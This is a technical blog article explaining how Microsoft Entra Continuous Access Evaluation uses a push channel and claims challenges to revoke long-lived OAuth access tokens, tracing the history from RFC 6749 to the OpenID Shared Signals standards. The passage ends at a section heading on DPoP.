Parag Mali - tag: zero-trust

The 28-Hour Bargain: How Continuous Access Evaluation Made Long-Lived Tokens Safe

noreply@paragmali.com (Parag Mali) — Sat, 30 May 2026 00:00:00 GMT

**Microsoft Entra Continuous Access Evaluation (CAE) lets access tokens safely live up to 28 hours.** It works by maintaining a push-subscription channel between Entra and Microsoft 365 resource providers, so that when a user is disabled, has their password reset, or has MFA enabled, the resource provider rejects the next request with a `401` and a claims challenge -- typically within 15 minutes for critical events, instantly for IP-location changes [@ms-cae-concept]. The same pattern was standardized by the OpenID Foundation on September 2, 2025 as SSF 1.0, CAEP 1.0, and RISC 1.0 Final Specifications [@openid-three-final-specs], opening the door to vendor-neutral cross-SaaS revocation. CAE does **not** solve token theft (use DPoP for that) and does **not** cover Microsoft Defender for Endpoint or Intune as resource providers (they are signal sources into Conditional Access, not CAE consumers).

1. Your Fired Employee Is Still Reading Email

09:00 Tuesday. The administrator disables the account at 09:01. At 09:23, the ex-employee's open Outlook for the Web tab refreshes -- and pulls down new mail. This is not a bug. This is RFC 6749 working exactly as designed. Until Microsoft Entra shipped a fix that took ten years and three standards bodies -- the IETF, the OpenID Foundation, and NIST -- to develop, the access token that user held at 09:00 stayed cryptographically valid until 10:00 at the latest, and there was nothing Conditional Access could do about it [@rfc-6749].

The window has a name now. It did not, for most of cloud identity's history. Microsoft's own documentation calls it "the lag between when conditions change for a user, and when policy changes are enforced" [@ms-cae-concept]. Between sign-in (Conditional Access territory) and the next token refresh (refresh-token territory) sits a stretch of time in which Conditional Access decisions have no enforcement surface. That stretch ranged from 60 minutes to 24 hours, depending on tenant configuration. For every OAuth 2.0 deployment from 2012 onward, this was the security debt the industry carried.

Note: "Microsoft Entra ID" is the rebranded name for what most engineers learned as "Azure Active Directory" or "Azure AD." Microsoft announced the rename in July 2023 [@ms-entra-rename-2023]; the underlying service, tenants, app registrations, and APIs are unchanged. Throughout this article, "Entra" and the older "Azure AD" refer to the same identity platform.

This article explains the engineering pattern that lets a Microsoft 365 tenant do two things that look contradictory at the same time: extend access-token lifetime from 1 hour to up to 28 hours, and revoke a disabled user's session in under 15 minutes [@ms-cae-concept]. The reconciling idea is a near-real-time push channel between the identity provider (Entra) and a small set of cooperating resource providers. When you can revoke a token in minutes rather than waiting for it to expire, expiry stops doing the security work, and the token can live as long as the user actually needs it.

Microsoft Entra's push-subscription channel between the identity provider and cooperating resource providers (Exchange Online, SharePoint Online, Teams, and Microsoft Graph). CAE lets a resource provider revoke an already-issued access token in near-real-time -- up to 15 minutes for critical events, instantly for IP-location changes -- without waiting for the token to expire [@ms-cae-concept].

The trade has a price. The 15-minute critical-event service-level objective is the price the channel pays for fanning out events across hyperscale Microsoft 365 infrastructure. Sub-second revocation is possible -- other vendors demonstrate it at smaller scales -- but at Exchange-Online volume, 15 minutes is the engineering economics. We will earn that number by Section 8.

For now: the OAuth 2.0 designers knew about this gap when they wrote RFC 6749 in 2012. They chose it on purpose. To see why, and to see why the obvious patches all failed, we have to walk back to the moment the trade was made.

2. The Static-Expiry Compromise

In October 2012, Dick Hardt of Microsoft published RFC 6749 -- The OAuth 2.0 Authorization Framework -- as the editor of record for an IETF working group that had spent five years arguing about it [@rfc-6749]. Section 1.4 carries one of the most consequential adjectives in cloud-identity history. Access tokens, it says, are credentials "usually with a short lifetime" used by the client to access a protected resource. The word usually is doing heavy lifting. Nothing in the protocol enforces it. Nothing in the protocol provides revocation. Nothing in the protocol stops a server from issuing 24-hour bearer tokens that, once minted, stay cryptographically valid until they expire on their own.

This was a deliberate trade. To see why it was rational, remember what came before.

Web Access Management: the model OAuth replaced

The pre-2012 enterprise-identity pattern in which every protected HTTP request synchronously queried a central policy decision point. Strength: instant revocation, because every request consulted authoritative state. Weakness: a chatty bottleneck that did not scale to cloud volumes and could not federate trust across organizations.

Web Access Management dominated enterprise identity from the late 1990s into the early 2010s. Every protected HTTP request to a WAM-fronted application made a synchronous round-trip to a Policy Decision Point. The PDP held authoritative session and policy state. Revoke a user? The next request failed, immediately, because the PDP said no. No token-lifetime window. No gap between policy change and enforcement.

WAM was correct. WAM was also unworkable for the web that was coming. It did not scale: every request was a network hop. It did not federate: cross-organization SaaS meant the PDP could not live inside any one company's network. And it required every protected resource to participate in a single trust domain. By the time enterprises were running cross-organization SaaS at scale, the WAM model had run out of road.

The OAuth 2.0 authors made the opposite trade. Replace the chatty PDP round-trip with a self-contained signed bearer token -- a JWT the resource server validates locally. Validation becomes O(1) cryptographic verification with no round-trip. Throughput scales horizontally. Federation works, because the JWT carries its own attestation of the issuer. Revocation becomes...approximated. By expiry. The token is valid until it isn't, and you trust that the lifetime is short enough.

For a 2012 web of forum logins and consumer mashups, "short enough" was a defensible answer. For a 2020 enterprise running compliance-bound SaaS across thousands of employees, it was not.

The Zero Trust pressure

Two intellectual pressures forced the question. The first came from Google. In December 2014, Rory Ward and Betsy Beyer published BeyondCorp: A New Approach to Enterprise Security in USENIX ;login: [@ward-beyer-2014-beyondcorp].Beyer would later co-author Site Reliability Engineering (O'Reilly, 2016); BeyondCorp came out of the same Google culture of evidence-driven infrastructure engineering. The argument was philosophical: a session is not a one-shot decision at sign-in. It is a time-varying authorization. Trust signals -- device posture, network location, behavioral risk -- change continuously, and the access decision should change with them. BeyondCorp was not a CAE implementation; it predates the term. But it planted the seed that login-time enforcement was not enough.

The second pressure was bureaucratic. In August 2020, NIST published Special Publication 800-207, Zero Trust Architecture, by Scott Rose, Oliver Borchert, Stu Mitchell, and Sean Connelly [@nist-sp-800-207]. SP 800-207 codified the BeyondCorp philosophy as U.S. federal guidance. One sentence made the engineering investment commercially rational: "Authentication and authorization (both subject and device) are discrete functions performed before a session to an enterprise resource is established." A federal mandate for continuous re-evaluation pushed every cloud vendor with U.S. government contracts to find an implementation. The gap RFC 6749 had left was now a procurement problem.

A name for the problem

The third moment named the gap. On February 21, 2019, Atul Tulshibagwale, then an engineer at Google, published Re-thinking federated identity with the Continuous Access Evaluation Protocol on the Google Cloud blog [@tulshibagwale-2019-google-blog]. The post introduced a term -- CAEP -- and a framing: publish-and-subscribe between identity providers and resource providers, as a third option between WAM's per-request chattiness and OAuth's fire-and-forget expiry. We return to Tulshibagwale's actual proposal in Section 5. For now what matters: 2019 was the year the industry got a vocabulary for a problem it had been carrying for seven years.

The OpenID Foundation working group that grew out of Tulshibagwale's proposal was originally chartered as the Shared Signals & Events (SSE) working group. It was renamed Shared Signals in subsequent years, but older industry write-ups from 2020-2022 still use the SSE abbreviation [@idsalliance-2022-11-cae].

gantt title CAE and Shared Signals timeline (2012-2025) dateFormat YYYY-MM axisFormat %Y section IETF standards RFC 6749 OAuth 2.0 :done, a1, 2012-10, 30d RFC 7009 Token Revocation :done, a2, 2013-08, 30d RFC 7662 Token Introspection :done, a3, 2015-10, 30d RFC 8417 SET :done, a4, 2018-07, 30d RFC 8935 SET Push :done, a5, 2020-11, 30d RFC 8936 SET Poll :done, a6, 2020-11, 30d section Zero Trust thinking BeyondCorp paper :done, b1, 2014-12, 30d NIST SP 800-207 Final :done, b2, 2020-08, 30d section CAEP origin and OIDF Tulshibagwale CAEP post :done, c1, 2019-02, 30d OIDF Shared Signals WG :done, c2, 2019-09, 30d SSF 1.0 CAEP 1.0 RISC 1.0 :done, c3, 2025-09, 30d section Microsoft Entra CAE Limited preview Weinert :done, d1, 2020-04, 30d Expanded preview Simons :done, d2, 2020-10, 30d General Availability :done, d3, 2022-01, 30d

The OAuth 2.0 designers traded revocation latency for throughput on purpose [@rfc-6749]. Once that gap proved unacceptable, three obvious patches were tried. None of them worked. To see why none of them worked is to understand the negative space CAE was designed to fill.

3. Three Patches, Three Failures

Between 2013 and the late 2010s, the OAuth community published three patches for RFC 6749's revocation gap. Each was rationally adopted; each was rationally abandoned at hyperscale. This section is the genealogy of those failures, because what each one got wrong defines the shape of the design that finally worked.

Patch 1: RFC 7009 -- the `/revoke` endpoint (August 2013)

In August 2013, Torsten Lodderstedt of Deutsche Telekom, Stefanie Dronia, and Marius Scurtescu of Google published RFC 7009, OAuth 2.0 Token Revocation [@rfc-7009]. The contribution was a standardized HTTP endpoint, /revoke, that a client could POST a token to in order to invalidate it. The mental model is the logout button: when a user signs out, the client tells the authorization server "I'm done with this token, please retire it."

The failure mode is in the threat model. RFC 7009 is client-initiated. The token holder asks for revocation. But the scenario that motivates CAE is precisely the one where the token holder is uncooperative. A fired employee will not POST their access token to /revoke on the way out the door. An attacker who has stolen a token will certainly not. The administrator on the other side cannot use the endpoint either, because they do not possess the bearer token.

Worse, RFC 7009's Implementation Note (Section 3) is candid about self-contained tokens: the only standardized recourse is "some (currently non-standardized) backend interaction between the authorization server and the resource server" when immediate revocation is desired [@rfc-7009]. Read that carefully. The spec admits there is no spec. The JWT in flight at the resource server is cryptographically valid until it expires. The authorization server can mark it revoked in a local database, but the resource server never asks. It validates the signature locally. The revocation event never crosses the wire.

RFC 7009 works for opaque tokens with a token-introspection back-channel. It does not, by itself, solve revocation for self-contained JWT bearers -- which by the mid-2010s were the dominant pattern in the cloud.

Patch 2: RFC 7662 -- the `/introspect` endpoint (October 2015)

Two years later, in October 2015, Justin Richer published RFC 7662, OAuth 2.0 Token Introspection [@rfc-7662]. The mechanism: on every request, the resource server calls a /introspect endpoint on the authorization server with the bearer token. The AS replies with the token's current state. If the token has been revoked, /introspect returns active: false, and the resource server denies the request.

This is correct. It also reintroduces the WAM bottleneck that OAuth was designed to escape.

For an AS serving billions of requests per day -- Microsoft Graph as one example, Google's IdP as another -- making /introspect the per-request critical path turns the authorization server into a synchronous dependency on every API call against every resource server in the estate. Latency adds up. Availability becomes shared. If the AS has a bad five minutes, every resource server has a bad five minutes simultaneously. The architecture OAuth bought with self-contained tokens -- resource server scales independently of AS -- gets traded back for exactly the WAM property that motivated OAuth's existence.

RFC 7662 introspection is alive and well. It remains the right choice for opaque-token systems and on-premises IdPs where the resource server count is small, the per-request latency budget is generous, and the AS is well within capacity. The criticism here is structural and only applies at hyperscale public-cloud volumes. RFC 7662 was not killed by RFC 7009 or by CAE; it is a parallel path that continues to serve a substantial fraction of the deployed OAuth surface.

Patch 3: Make the token life so short revocation does not matter

The third patch was the obvious one. If you cannot revoke a token mid-life, make its life short. Issue access tokens with a minutes-long lifetime, the way early Microsoft experiments did. The revocation window collapses. Problem solved.

Microsoft tried it. The retrospective is unusually candid. On April 21, 2020, Alex Weinert, then Director of Identity Security at Microsoft, published Moving towards real time policy and security enforcement on the Azure Active Directory Identity Blog [@weinert-2020-04-real-time]. (The original lives at post ID 1276933 on Microsoft's tech community; the full body is preserved in Microsoft's Japanese translation on the jpazureid GitHub mirror [@jpazureid-blog-1-japanese].) The post names the failure mode in one sentence:

"We have experimented with the "blunt object" approach of reduced token lifetimes but found they can degrade user experiences and reliability without eliminating risks." -- Alex Weinert, Microsoft, April 21, 2020 [@weinert-2020-04-real-time]

Two things break. First, user experience and reliability. Every short-lifetime boundary forces every active client to round-trip the IdP for a fresh token. For Outlook, Teams, Word Online, OneDrive, and every other client an enterprise user has open at once, that is a wave of token requests per user per cycle. Multiplied by Microsoft 365 active users, the load profile creates real outages. Network blips that would otherwise be invisible surface as failed refreshes, with user-visible re-authentication prompts. Second, it does not eliminate the risk. A minutes-long window is still a window. A fired employee can read or exfiltrate a great deal of email in that window. You have paid the full user-experience cost and still left a non-trivial breach surface.

This was the third failure. The negative space across the three patches defines the shape any real solution has to take: it must be server-initiated (not RFC 7009), it must be push-based rather than per-request poll (not RFC 7662), and it must separate revocation from expiry so the IdP does not pay for every revocation with a refresh-load spike (not the short-lifetime patch). The three failures exhaust the surface of the obvious fix.

Note: Each of the three patches fails for a different reason; together they rule out everything except server-initiated push subscription that decouples revocation from expiry.

If the patches all fail, the next move has to be architectural. The first published statement of that architecture was Atul Tulshibagwale's February 2019 Google blog post -- and the move he proposed is the one Microsoft would ship three years later.

4. Four Generations of Session Enforcement

Walk forward through the genealogy of session enforcement and the breakthrough in Section 5 stops looking like a stroke of genius and starts looking like the only move the design space had left. Four generations, each killed by a documented limit of the previous one.

Generation 0: WAM (pre-2012)

Per-request synchronous round-trip to a Policy Decision Point. Instant revocation; chatty bottleneck; no federation. Killed by cloud-scale request rates and the rise of cross-organization SaaS, where the protected resource and the policy authority no longer lived in the same trust domain. WAM remains valuable in single-tenant enterprise contexts, but for the public-cloud API mesh it cannot scale.

Generation 1: Static-expiry JWT (2012-2020)

Self-contained signed bearer tokens validated locally at the resource server. Revocation approximated by expiry per RFC 6749 [@rfc-6749]. Throughput scales; federation works; revocation is acceptable when the lifetime is short and the threat model is benign. Killed by (a) the fired-employee window, (b) the three failed Section 3 patches, and (c) the philosophical pressure from Zero Trust to treat sessions as continuously re-evaluated.

Generation 2: Microsoft CAE (limited preview April 2020, GA January 10, 2022)

The first production solution. Limited preview launched in April 2020 with Alex Weinert's Moving towards real time policy and security enforcement announcement [@weinert-2020-04-real-time]. Expanded public preview October 2020 [@simons-2020-10-expanded-preview; @vansurksum-2020-10-10]. General Availability January 10, 2022, announced by Alex Simons, Corporate VP for Program Management in the Microsoft Identity Division [@simons-2022-01-ga-rss].

The architecture is a private push-subscription channel between Entra and a small set of Microsoft 365 resource providers, with a wire-level handshake (the claims challenge) for telling the client to re-acquire a token reflecting new state. Access-token lifetime extends from the default 1 hour to up to 28 hours specifically for CAE-aware sessions [@ms-cae-concept]. We will unpack the mechanism in Section 5.

The Gen-2 limitation that motivated Gen 3: the wire format is Microsoft-internal. A SaaS vendor that wants the same revocation properties for its own resource provider cannot use Microsoft's CAE channel. The protocol does not federate.

Generation 3: OpenID SSF 1.0 + CAEP 1.0 + RISC 1.0 (Final Specifications, September 2, 2025)

The OpenID Foundation generalized the Microsoft pattern into a vendor-neutral specification. On September 2, 2025, three Final Specifications were approved: the Shared Signals Framework 1.0 (SSF), the Continuous Access Evaluation Profile 1.0 (CAEP), and the Risk and Incident Sharing and Coordination 1.0 (RISC) [@openid-three-final-specs; @openid-sharedsignals-wg].

The wire envelope is IETF RFC 8417's Security Event Token (SET), published in July 2018 by Phil Hunt (Oracle), Michael Jones (Microsoft), William Denniss (Google), and Morteza Ansari (Cisco) [@rfc-8417]. A SET is a signed JWT carrying a single security event. The transport layer is RFC 8935 push (POST over TLS from transmitter to receiver) and RFC 8936 poll (recipient-initiated retrieval), both published November 2020 by Annabelle Backman and collaborators [@rfc-8935; @rfc-8936]. SSF defines the subscription model -- streams, subjects, transmitter and receiver metadata endpoints. CAEP and RISC define the vocabulary of events that can ride that envelope.

IETF RFC 8417's standardized signed-JWT envelope for transmitting security-relevant events between systems. Each SET carries exactly one event with a well-defined event-type URI; the envelope is signature-protected and timestamp-bearing. SET is the wire format underlying CAEP, SSF, and RISC, as well as Microsoft's internal CAE protocol [@rfc-8417].

RFC 8417 was a cross-vendor IETF effort that pre-dated the OpenID Shared Signals working group by a year. Phil Hunt was at Oracle; Michael Jones at Microsoft; William Denniss at Google; Morteza Ansari at Cisco. The envelope-only design -- leaving event vocabularies to higher-layer profiles -- is what allowed both Microsoft's internal protocol and the OpenID profiles to converge on the same wire format without coordination [@rfc-8417].

flowchart TD L4["Layer 4: Event vocabularies
CAEP 1.0 (session) and RISC 1.0 (account)"] L3["Layer 3: Subscription and stream model
OpenID SSF 1.0"] L2["Layer 2: HTTP transport
RFC 8935 push, RFC 8936 poll"] L1["Layer 1: Signed event envelope
RFC 8417 Security Event Token (SET)"] L4 --> L3 L3 --> L2 L2 --> L1

The generation chain has a documented engineering reason for each transition. The comparison matrix below pulls the essentials together.

Approach	Year	Revocation latency	Strengths	Weaknesses
WAM (Gen 0)	pre-2012	Instant	Authoritative state, instant enforcement	No federation, per-request bottleneck
Static-expiry JWT (Gen 1)	2012-2020	Up to token lifetime (1h-24h)	O(1) RP validation, federation works	No revocation; fired-employee window
Short-lifetime patch	mid-2010s	Minutes	Conceptually simple	Load amplification, window remains, UX degradation
RFC 7662 introspection	2015 onward	Instant	Standardized, works for opaque tokens	AS becomes per-request critical path
Microsoft CAE (Gen 2)	2020-2022	Up to 15 min critical; instant IP	Push, decoupled from request rate, long tokens safe	Microsoft-internal protocol; tiny RP set
OpenID SSF/CAEP (Gen 3)	2025 onward	Vendor-dependent	Vendor-neutral standard, cross-SaaS	Receiver adoption still early

flowchart LR G0["Gen 0: WAM
per-request PDP"] G1["Gen 1: Static-expiry JWT
RFC 6749 (2012)"] G2["Gen 2: Microsoft CAE
GA January 2022"] G3["Gen 3: OpenID SSF and CAEP
Final September 2025"] G0 -- "cloud scale and federation" --> G1 G1 -- "fired-employee window, patches fail" --> G2 G2 -- "Microsoft-only, no cross-SaaS" --> G3

Knowing the lineage is not knowing the trick. What is the actual mechanism CAE deploys -- the thing that turns this standards-history arc into a feature that ships and makes 28-hour tokens defensible? It has three parts, and once you see them together, you understand why long tokens are safe.

5. Subscription, Claims Challenge, Extended Lifetime

Three innovations, none new in isolation, all unprecedented in combination. This is the section where you see the trick.

Atul Tulshibagwale's 2019 framing names the move: "Our vision for continuous access evaluation is based on a publish-and-subscribe ('pub-sub') approach... It's complementary to federated or cert-based authentication... It's not as chatty as WAM... It doesn't impact latency for user access" [@tulshibagwale-2019-google-blog]. Pub-sub is the third option between WAM's per-request chattiness and RFC 6749's fire-and-forget. Subscription is the channel; claims challenge is the wire-level handshake; extended lifetime is the user-experience prize.

Part 1: Subscription

Microsoft's CAE concept page describes the architecture in one sentence that rewards close reading:

Timely response to policy violations or security issues really requires a 'conversation' between the token issuer Microsoft Entra, and the relying party (enlightened app). -- Microsoft Learn, *Continuous access evaluation in Microsoft Entra* [@ms-cae-concept]

The word conversation is the architecture. The relying party (a CAE-aware Microsoft 365 workload such as Exchange Online) subscribes to a finite, documented set of critical events for the subjects it cares about. Entra pushes events to the RP as state changes. State is cached at the RP. On the hot path -- the per-request data plane -- the RP does an O(1) JWT signature verification plus an O(1) hash-table lookup of cached revocation state. No back-channel round-trip on the hot path. The 28-hour token costs no more to validate than the 1-hour token it replaced [@ms-cae-concept].

This is the move that defeats RFC 7662. The state lives at the RP, not at the AS. The control-plane cost scales with the rate of events, not the rate of requests. Push, not poll.

Part 2: The claims challenge

When state at the RP changes -- because a push event has arrived saying "this user's password has been reset" -- the RP cannot reach into a request that has already been accepted and is being served. CAE is in-band with the next request, not the current one. The next time the client presents the stale token, the RP rejects it with HTTP 401 and a specific header:

HTTP/1.1 401 Unauthorized
WWW-Authenticate: Bearer error="insufficient_claims",
                  claims="eyJhY2Nlc3NfdG9rZW4iOnsiYWNyc..."

The claims parameter is a base64url-encoded JSON object that tells the client what to re-acquire from the IdP. The Microsoft Authentication Library (MSAL) on the client decodes the challenge transparently and requests a new access token from Entra with the indicated claims. Entra either issues a fresh CAE-aware token (if authorization still holds) or rejects, forcing interactive re-authentication. The client retries the original API call with the new token [@ms-cae-app-resilience].

The HTTP-level mechanism by which a CAE-aware resource provider signals to a client that the presented token must be re-acquired with fresh state. The challenge is conveyed as a `WWW-Authenticate: Bearer error="insufficient_claims"` header with a base64url-encoded `claims` parameter; current Microsoft Authentication Library (MSAL) releases decode and handle it automatically when the client app registration declares the `xms_cc` capability `["cp1"]` [@ms-cae-app-resilience].

This is the move that defeats RFC 7009. Revocation is initiated by the resource provider's view of the IdP's state, not by the token holder. A fired employee's client cannot opt out of the claims challenge; the RP will not serve any further request until a fresh token arrives that reflects the post-revocation state.

{` // A real-shape WWW-Authenticate header from a CAE-aware resource provider. // The 'claims' parameter is base64url-encoded JSON. const header = 'Bearer error="insufficient_claims", claims="eyJhY2Nlc3NfdG9rZW4iOnsibmJmIjp7ImVzc2VudGlhbCI6dHJ1ZSwgInZhbHVlIjoiMTcyMDQ4MDA0MyJ9fX0="';

// Extract the claims parameter const match = header.match(/claims="([^"]+)"/); const b64 = match ? match[1] : null;

// base64url decode (Node 'Buffer' would work; here we use the browser-safe approach) function b64urlDecode(s) { s = s.replace(/-/g, '+').replace(/_/g, '/'); while (s.length % 4) s += '='; return atob(s); }

const claimsJson = b64urlDecode(b64); console.log(JSON.parse(claimsJson)); // { // "access_token": { // "nbf": { // "essential": true, // "value": "1720480043" // } // } // } // MSAL reads this and requests a new token whose 'nbf' (not-before) is at least // the supplied timestamp -- i.e., a token issued after the state change. `}

The nbf (not-before) claim challenge is the most common shape: the RP is telling the client "give me a token issued after this moment." The client requests one. Entra checks current state -- did the user get disabled? did the password get reset? did the risk score elevate? -- and either issues or denies. The wire format is simple enough to inspect in a browser tab, which is part of why the architecture has been able to standardize: there is no magic to reverse-engineer.

Part 3: Extended lifetime, the prize

The first two parts buy you the third. Once revocation is push-based and the claims challenge gives the RP a way to evict stale tokens within seconds of seeing a control-plane event, the expiry timer stops carrying the security weight. Tokens can live longer because the expiry is no longer the only revocation mechanism.

Microsoft documents the upper bound as "up to 28 hours" for CAE-aware sessions [@ms-cae-concept; @ms-cae-app-resilience]. The default for non-CAE-capable clients remains 1 hour. This is the move that defeats the short-lifetime patch: the IdP load profile collapses because tokens refresh once a day, not on a per-minute cycle, and the revocation window is dramatically smaller -- not because expiry shrank, but because the channel now does the revocation work expiry used to do.

Key idea: Long-lived access tokens are safe only when paired with a near-real-time revocation channel. CAE is the channel. Subscription provides the push, the claims challenge is the in-band handshake the push enables, and the 28-hour lifetime is what the channel buys -- not what the channel costs.

The full round trip

The three parts interlock. The complete flow, from a state change at Entra to a re-validated request, runs end-to-end through every layer the article has named.

sequenceDiagram participant Admin participant Entra as Microsoft Entra participant Client as Client (MSAL) participant RP as Resource Provider (e.g. Exchange Online) Admin->>Entra: Disable user account Entra->>RP: Push critical-event SET (account disabled) Note over RP: Updates cached revocation state for (sub, tenant) Client->>RP: GET /me/messages (Authorization Bearer old token) Note over RP: Validates JWT signature O(1), checks cached state RP-->>Client: 401 plus WWW-Authenticate insufficient_claims Note over Client: MSAL parses claims challenge from header Client->>Entra: Token request with claims Note over Entra: Checks current user state, account is disabled Entra-->>Client: 400 invalid_grant or interactive re-auth required Note over Client: User cannot recover, session terminates

Three moves, one design. Remove any one and the system collapses. Subscription without a claims challenge gives you push events the RP cannot act on at the wire. Claims challenge without subscription gives you a 401 mechanism with no information to decide when to fire it. Extended lifetime without either gives you Generation 1's fired-employee window. The 28-hour token is not the cost of CAE; it is what CAE purchases.

This is the design. What does it actually do in production today, and where does it stop?

6. CAE as Deployed in Microsoft Entra (2026)

Concrete answers to concrete questions. Which events trigger CAE? Who participates? What is the actual SLA? How long do tokens actually live? No marketing language; only what Microsoft Learn currently documents.

Critical event evaluation events

Microsoft Learn lists exactly five events that drive critical event evaluation at the IdP-to-RP boundary [@ms-cae-concept]:

A user account is deleted or disabled.
A password for a user is changed or reset.
Multi-factor authentication is enabled for the user.
An administrator explicitly revokes all refresh tokens for a user.
High user risk is detected by Microsoft Entra ID Protection.

These five events propagate from Entra to the participating CAE-aware resource providers via the push channel. Microsoft's published service-level objective is "up to 15 minutes" for critical-event propagation [@ms-cae-concept]. That is not the same as "instant." The phrase to avoid is "CAE delivers instant revocation"; the accurate phrase is "CAE delivers near-real-time revocation, typically within 15 minutes for critical events."

A separate scenario -- Conditional Access policy evaluation -- covers network and IP-location changes. Here the SLA is different: IP-location enforcement is instant per Microsoft's published documentation [@ms-cae-concept]. The difference is mechanical. IP location is a property the RP sees directly on every request (the source IP of the incoming HTTP connection); the RP can compare it against the location constraints attached to the session and reject locally with no propagation delay. Critical events have to travel from Entra to the RP through the event channel, and that travel has a 15-minute budget at Microsoft 365 scale.

Event	Source	Propagation	Notes
Account deleted or disabled	Entra ID directory	Up to 15 min	Honored by Exchange Online, SharePoint Online, Teams, Graph (CA)
Password changed or reset	Entra ID directory	Up to 15 min	Same RP set
MFA enabled for user	Entra ID directory	Up to 15 min	Same RP set
All refresh tokens revoked (admin)	Entra ID admin action	Up to 15 min	Same RP set
High user risk detected	Entra ID Protection	Up to 15 min	SharePoint Online does not honor user-risk events [@ms-cae-concept]
IP location changed (CA policy)	Resource-provider observation	Instant	Conditional Access policy evaluation path; strict location enforcement [@ms-strict-location-enforcement]

Note: Microsoft Defender for Endpoint and Microsoft Intune (MDM) are signal sources into Conditional Access. They contribute to the risk score and device-compliance state that drive CA policy decisions, but they are not CAE-consuming resource providers. They do not subscribe to Entra critical-event notifications and they do not enforce the claims-challenge handshake on token-bearing requests. The CAE-aware RP set is exactly: Exchange Online, SharePoint Online, Microsoft Teams, and Microsoft Graph (the last only for Conditional Access policy evaluation) [@ms-cae-concept]. If you read older deck slides or vendor blog posts that list MDE or Intune as CAE participants, they are conflating the signal-source role with the resource-provider role.

The SharePoint Online user-risk caveat is a concrete example of why "CAE-aware" is not a binary property at the workload level. SharePoint Online is fully CAE-aware for the first four critical events on the list; it just does not subscribe to user-risk events specifically. The lesson is that you must read the per-workload documentation carefully when designing controls that depend on a specific event's enforcement [@ms-cae-concept].

Workloads that participate

The CAE-aware resource-provider set, per Microsoft Learn [@ms-cae-concept]:

Exchange Online -- full CAE consumer (initial implementation, October 2020).
SharePoint Online -- full CAE consumer, with the user-risk caveat noted above.
Microsoft Teams -- full CAE consumer (initial implementation), per Alex Simons's January 2022 GA announcement [@simons-2022-01-ga-rss].
Microsoft Graph -- consumes Conditional Access policy evaluation events (the IP-location instant path); narrower scope than the M365 productivity workloads.

Client-side support is also explicit. Microsoft's compatibility tables in the CAE concept page enumerate which client and server combinations are Supported, Partially supported, or Not Supported on every major operating system and form factor [@ms-cae-concept]. Office web apps against SharePoint Online and Exchange Online are documented as Not Supported on several combinations; every Teams client surface shows as Partially supported. The point is not that CAE is broken on these surfaces -- it is that Microsoft documents the rough edges in primary source, and tenant administrators who care about specific scenarios must read the table.

Tokens and clients

The default access-token lifetime for CAE-aware sessions is up to 28 hours; the default for non-CAE-capable clients remains 1 hour [@ms-cae-concept; @ms-cae-app-resilience]. Client support requires a current Microsoft Authentication Library (MSAL) release on the target platform: the 4.x line for .NET and JavaScript; the appropriate current line for Python, Java, Android, iOS, or macOS, per each SDK's own release stream. Microsoft Learn's Use Continuous Access Evaluation enabled APIs page enumerates per-SDK guidance [@ms-cae-app-resilience]. The app registration must also declare the xms_cc client capability with value ["cp1"] to advertise CAE-handling support to the IdP [@ms-cae-app-resilience].

An app-registration claim by which a client advertises support for CAE-aware token issuance. The canonical wire-level value in the issued JWT is lowercase `"cp1"` (Microsoft's developer docs show both `"cp1"` and `"CP1"`; negotiation is case-insensitive but the token claim is lowercase). It signals that the client's MSAL implementation can decode and act on a `WWW-Authenticate: Bearer error="insufficient_claims"` response by parsing the `claims` parameter and re-acquiring a token. Without it, Entra issues the default 1-hour token and the resource provider falls back to standard expiry [@ms-cae-app-resilience]. A Microsoft 365 workload (Exchange Online, SharePoint Online, Teams, or Microsoft Graph for Conditional Access policy) that consumes Entra's critical-event notifications and enforces them on subsequent token-bearing requests via the claims-challenge handshake. This is a narrower meaning than the generic OAuth 2.0 sense of "resource server"; in CAE, "resource provider" specifically means a workload that has implemented the CAE participation contract with Entra [@ms-cae-concept]. Microsoft documents an *upper bound* on token lifetime. The actual lifetime issued for any given session is variable and can be shorter. CAE-aware sessions can also be refreshed silently as long as the channel signals nothing has changed. Practically, this means most users with CAE-aware clients on M365 productivity workloads almost never see an interactive re-authentication prompt during normal working hours [@ms-cae-concept].

A migration note for older tenants

Tenant administrators with Conditional Access policies that pre-date GA may carry legacy "strict location enforcement" preview settings. Microsoft has since migrated the feature into GA, and the current Microsoft Learn page Strictly enforce location policies using continuous access evaluation documents the post-migration configuration model [@ms-strict-location-enforcement]. Administrators should verify their policies after each major Conditional Access feature wave to ensure preview-to-GA migrations have been picked up.

CAE is one approach among several. Where does it sit relative to introspection-per-request, identity-aware proxies, DPoP, and the cross-vendor OpenID standard? The design space is small enough to map cleanly.

7. Competing Approaches and Their Relation to CAE

Five named methods occupy adjacent positions in the design space. Some compete; some compose. The map matters because deployments that confuse the two get wrong answers.

CAE versus OpenID SSF and CAEP 1.0

Same architecture, different implementations. Microsoft CAE solves the Microsoft estate via a Microsoft-internal protocol; OpenID SSF and CAEP solve the cross-vendor SaaS long tail via a public standard atop RFC 8417 [@openid-three-final-specs; @openid-ssf-1_0-final; @openid-caep-1_0]. The two are convergent rather than rivalrous: Microsoft is moving toward also acting as an SSF transmitter and receiver alongside its first-party CAE protocol, and other vendors are building SSF receivers that can consume signals from any transmitter, including Microsoft.

The Authenticate 2025 interop event in October 2025 was the first whose tested text was the Final-Specification version of SSF [@openid-authenticate-2025-interop]. Multi-vendor SSF and CAEP interoperability has been demonstrated at successive Gartner IAM Summit interop events as well. At the March 2024 London summit, SGNL's CAEP Hub interoperated as both transmitter and receiver with Cisco Duo, Okta, SailPoint, and Helisoft on the session-revoked CAEP event [@sgnl-2024-04-interop]. Okta's own blog characterizes the March 2025 London summit as "a significant industry shift toward interconnected, real-time security" with "interoperable implementations from pioneers like Okta, Google, IBM, Omnissa, SailPoint, and Thales" [@okta-shared-signals].

Tim Cappalli, who joined Okta after his time at Microsoft, co-chairs the OpenID Shared Signals Working Group alongside Atul Tulshibagwale (SGNL, formerly Google) [@tulshibagwale-sgnl-2023-08-qanda; @openid-sharedsignals-wg]. The cross-vendor co-chair arrangement is part of why the Final Specifications passed without significant vendor pushback: the people doing the standardization had visibility into both Microsoft's and Google's prior implementations.

CAE versus RFC 7662 introspection

Parallel paths, not competitors. RFC 7662 introspection [@rfc-7662] continues to be the right answer for opaque-token systems and on-premises IdPs where the AS-to-RP per-request round-trip is acceptable. CAE wins at hyperscale public-cloud volumes specifically because it inverts the per-request dependency: state pushes to the RP once and lives in cache; the data plane does not consult the AS on every request. If you are building a B2B integration with a small RP count and a few hundred requests per second, RFC 7662 is fine. If you are building Exchange Online, it is not.

CAE versus DPoP and mTLS-bound tokens

